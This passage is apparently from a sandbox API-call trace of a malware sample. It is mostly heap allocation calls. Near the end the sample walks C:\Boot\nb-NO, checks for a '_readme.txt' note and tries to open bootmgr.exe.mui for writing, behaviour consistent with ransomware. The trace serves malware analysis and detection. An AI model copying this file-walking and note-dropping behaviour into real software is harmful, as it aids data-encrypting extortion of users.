RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2280 [0130.024] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0130.025] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9660 | out: hHeap=0x4970000) returned 1 [0130.025] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9660 [0130.025] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2280 [0130.025] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0130.025] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9660 | out: hHeap=0x4970000) returned 1 [0130.025] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9660 [0130.025] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2280 [0130.025] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0130.025] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9660 | out: hHeap=0x4970000) returned 1 [0130.025] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9660 [0130.025] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2280 [0130.025] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0130.025] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9660 | out: hHeap=0x4970000) returned 1 [0130.025] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9660 [0130.025] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2280 [0130.025] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0130.025] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9660 | out: hHeap=0x4970000) returned 1 [0130.025] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9660 [0130.025] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2280 [0130.025] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0130.025] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9660 | out: hHeap=0x4970000) returned 1 [0130.025] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9660 [0130.025] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2280 [0130.025] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc46) returned 0x7516fe8 [0130.025] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0130.025] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7516fe8 | out: hHeap=0x4970000) returned 1 [0130.025] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9660 | out: hHeap=0x4970000) returned 1 [0130.025] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9660 [0130.025] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2280 [0130.026] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0130.026] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9660 | out: hHeap=0x4970000) returned 1 [0130.026] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9660 [0130.026] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x860) returned 0x7516fe8 [0130.026] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7516fe8 | out: hHeap=0x4970000) returned 1 [0130.026] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9660 | out: hHeap=0x4970000) returned 1 [0130.026] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9660 [0130.026] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x860) returned 0x7516fe8 [0130.026] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7516fe8 | out: hHeap=0x4970000) returned 1 [0130.026] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9660 | out: hHeap=0x4970000) returned 1 [0130.026] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9660 [0130.026] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2280 [0130.026] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0130.026] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9660 | out: hHeap=0x4970000) returned 1 [0130.026] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9660 [0130.026] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2280 [0130.026] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0130.026] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9660 | out: hHeap=0x4970000) returned 1 [0130.026] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9660 [0130.026] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2280 [0130.026] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc46) returned 0x7516fe8 [0130.026] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0130.026] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7516fe8 | out: hHeap=0x4970000) returned 1 [0130.026] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9660 | out: hHeap=0x4970000) returned 1 [0130.026] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9660 [0130.026] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x840) returned 0xdcd2280 [0130.026] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0130.026] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9660 | out: hHeap=0x4970000) returned 1 [0130.027] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9660 [0130.027] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x840) returned 0xdcd2280 [0130.027] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0130.027] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9660 | out: hHeap=0x4970000) returned 1 [0130.027] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9660 [0130.027] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2280 [0130.027] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0130.027] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9660 | out: hHeap=0x4970000) returned 1 [0130.027] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9660 [0130.027] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2280 [0130.027] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0130.027] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9660 | out: hHeap=0x4970000) returned 1 [0130.027] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9660 [0130.027] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2280 [0130.027] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0130.027] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9660 | out: hHeap=0x4970000) returned 1 [0130.027] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9660 [0130.027] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2280 [0130.027] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0130.027] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9660 | out: hHeap=0x4970000) returned 1 [0130.027] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9660 [0130.027] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2280 [0130.027] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0130.027] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9660 | out: hHeap=0x4970000) returned 1 [0130.027] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9660 [0130.027] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2280 [0130.027] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0130.027] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9660 | out: hHeap=0x4970000) returned 1 [0130.027] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9660 [0130.028] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2280 [0130.028] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0130.028] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9660 | out: hHeap=0x4970000) returned 1 [0130.028] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9660 [0130.028] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2280 [0130.028] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc46) returned 0x7516fe8 [0130.028] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0130.028] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7516fe8 | out: hHeap=0x4970000) returned 1 [0130.028] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9660 | out: hHeap=0x4970000) returned 1 [0130.028] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9660 [0130.028] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2280 [0130.028] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0130.028] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9660 | out: hHeap=0x4970000) returned 1 [0130.028] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9660 [0130.028] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x860) returned 0x7516fe8 [0130.028] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7516fe8 | out: hHeap=0x4970000) returned 1 [0130.028] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9660 | out: hHeap=0x4970000) returned 1 [0130.028] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9660 [0130.028] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x860) returned 0x7516fe8 [0130.028] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7516fe8 | out: hHeap=0x4970000) returned 1 [0130.028] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9660 | out: hHeap=0x4970000) returned 1 [0130.028] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9660 [0130.028] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2280 [0130.028] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0130.028] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9660 | out: hHeap=0x4970000) returned 1 [0130.028] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9660 [0130.028] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2280 [0130.028] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0130.029] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9660 | out: hHeap=0x4970000) returned 1 [0130.029] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9660 [0130.029] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2280 [0130.029] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc46) returned 0x7516fe8 [0130.029] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0130.029] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7516fe8 | out: hHeap=0x4970000) returned 1 [0130.029] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9660 | out: hHeap=0x4970000) returned 1 [0130.029] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9660 [0130.029] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x840) returned 0xdcd2280 [0130.029] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0130.029] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9660 | out: hHeap=0x4970000) returned 1 [0130.029] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9660 [0130.029] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2280 [0130.029] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0130.029] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9660 | out: hHeap=0x4970000) returned 1 [0130.029] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9660 [0130.029] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2280 [0130.029] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0130.029] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9660 | out: hHeap=0x4970000) returned 1 [0130.029] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9660 [0130.029] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2280 [0130.029] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0130.029] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9660 | out: hHeap=0x4970000) returned 1 [0130.029] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9660 [0130.029] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2280 [0130.029] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0130.029] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9660 | out: hHeap=0x4970000) returned 1 [0130.029] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9660 [0130.029] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2280 [0130.030] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0130.030] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9660 | out: hHeap=0x4970000) returned 1 [0130.030] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9660 [0130.030] PathFindFileNameW (pszPath="C:\\Boot\\nb-NO\\") returned="nb-NO\\" [0130.030] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9d90 [0130.030] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9660 | out: hHeap=0x4970000) returned 1 [0130.030] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0130.030] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9d90 | out: hHeap=0x4970000) returned 1 [0130.030] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0130.030] PathFindFileNameW (pszPath="") returned="" [0130.030] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9d90 [0130.030] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x759d0000 [0130.031] GetProcAddress (hModule=0x759d0000, lpProcName="SHGetFolderPathW") returned 0x75a55708 [0130.031] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x800) returned 0x7516fe8 [0130.031] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x7516fe8 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0130.031] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x810) returned 0xdcd2280 [0130.031] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9660 [0130.031] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0130.031] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9408 [0130.031] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9d90 | out: hHeap=0x4970000) returned 1 [0130.031] FreeLibrary (hLibModule=0x759d0000) returned 1 [0130.031] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9660 | out: hHeap=0x4970000) returned 1 [0130.031] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7516fe8 | out: hHeap=0x4970000) returned 1 [0130.031] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9408 | out: hHeap=0x4970000) returned 1 [0130.031] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9408 [0130.031] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x81c) returned 0xdcd2280 [0130.031] PathAppendW (in: pszPath="C:\\Boot\\nb-NO\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\nb-NO\\_readme.txt") returned 1 [0130.032] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2b08 [0130.032] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9408 | out: hHeap=0x4970000) returned 1 [0130.032] PathFileExistsW (pszPath="C:\\Boot\\nb-NO\\_readme.txt") returned 1 [0130.032] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0130.032] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9408 [0130.032] FindFirstFileW (in: lpFileName="C:\\Boot\\nb-NO\\*", lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xe38b88c0, ftLastAccessTime.dwHighDateTime=0x1d6d58a, ftLastWriteTime.dwLowDateTime=0xe38b88c0, ftLastWriteTime.dwHighDateTime=0x1d6d58a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x49a4880 [0130.032] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9408 | out: hHeap=0x4970000) returned 1 [0130.032] FindNextFileW (in: hFindFile=0x49a4880, lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xe38b88c0, ftLastAccessTime.dwHighDateTime=0x1d6d58a, ftLastWriteTime.dwLowDateTime=0xe38b88c0, ftLastWriteTime.dwHighDateTime=0x1d6d58a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0130.032] FindNextFileW (in: hFindFile=0x49a4880, lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xea212efb, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15850, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0130.032] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9408 [0130.032] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x40) returned 0xdcf2d70 [0130.032] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9408 | out: hHeap=0x4970000) returned 1 [0130.032] PathFindExtensionW (pszPath="C:\\Boot\\nb-NO\\bootmgr.exe.mui") returned=".mui" [0130.033] CreateFileW (lpFileName="C:\\Boot\\nb-NO\\bootmgr.exe.mui" (normalized: "c:\\boot\\nb-no\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0130.033] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcf2d70 | out: hHeap=0x4970000) returned 1 [0130.033] FindNextFileW (in: hFindFile=0x49a4880, lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe38b88c0, ftCreationTime.dwHighDateTime=0x1d6d58a, ftLastAccessTime.dwLowDateTime=0xe38b88c0, ftLastAccessTime.dwHighDateTime=0x1d6d58a, ftLastWriteTime.dwLowDateTime=0xe38b88c0, ftLastWriteTime.dwHighDateTime=0x1d6d58a, nFileSizeHigh=0x0, nFileSizeLow=0x45c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 1 [0130.033] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9408 [0130.033] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x40) returned 0xdcf2d70 [0130.033] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9408 | out: hHeap=0x4970000) returned 1 [0130.033] PathFindExtensionW (pszPath="C:\\Boot\\nb-NO\\_readme.txt") returned=".txt" [0130.033] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcf2d70 | out: hHeap=0x4970000) returned 1 [0130.033] FindNextFileW (in: hFindFile=0x49a4880, lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe38b88c0, ftCreationTime.dwHighDateTime=0x1d6d58a, ftLastAccessTime.dwLowDateTime=0xe38b88c0, ftLastAccessTime.dwHighDateTime=0x1d6d58a, ftLastWriteTime.dwLowDateTime=0xe38b88c0, ftLastWriteTime.dwHighDateTime=0x1d6d58a, nFileSizeHigh=0x0, nFileSizeLow=0x45c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 0 [0130.033] FindClose (in: hFindFile=0x49a4880 | out: hFindFile=0x49a4880) returned 1 [0130.033] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0130.033] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce97a0 | out: hHeap=0x4970000) returned 1 [0130.033] PeekMessageW (in: lpMsg=0xe00ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0xe00ff08) returned 0 [0130.033] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce97a0 [0130.033] PeekMessageW (in: lpMsg=0xe00fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0xe00fb74) returned 0 [0130.033] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9408 [0130.033] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2b08 [0130.033] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0130.034] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9408 | out: hHeap=0x4970000) returned 1 [0130.034] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9408 [0130.034] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2b08 [0130.034] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0130.034] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9408 | out: hHeap=0x4970000) returned 1 [0130.034] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9408 [0130.034] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2b08 [0130.034] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0130.034] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9408 | out: hHeap=0x4970000) returned 1 [0130.034] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9408 [0130.034] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2b08 [0130.034] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0130.034] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9408 | out: hHeap=0x4970000) returned 1 [0130.034] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9408 [0130.034] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2b08 [0130.034] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0130.034] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9408 | out: hHeap=0x4970000) returned 1 [0130.034] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9408 [0130.034] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x840) returned 0xdcd2b08 [0130.034] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 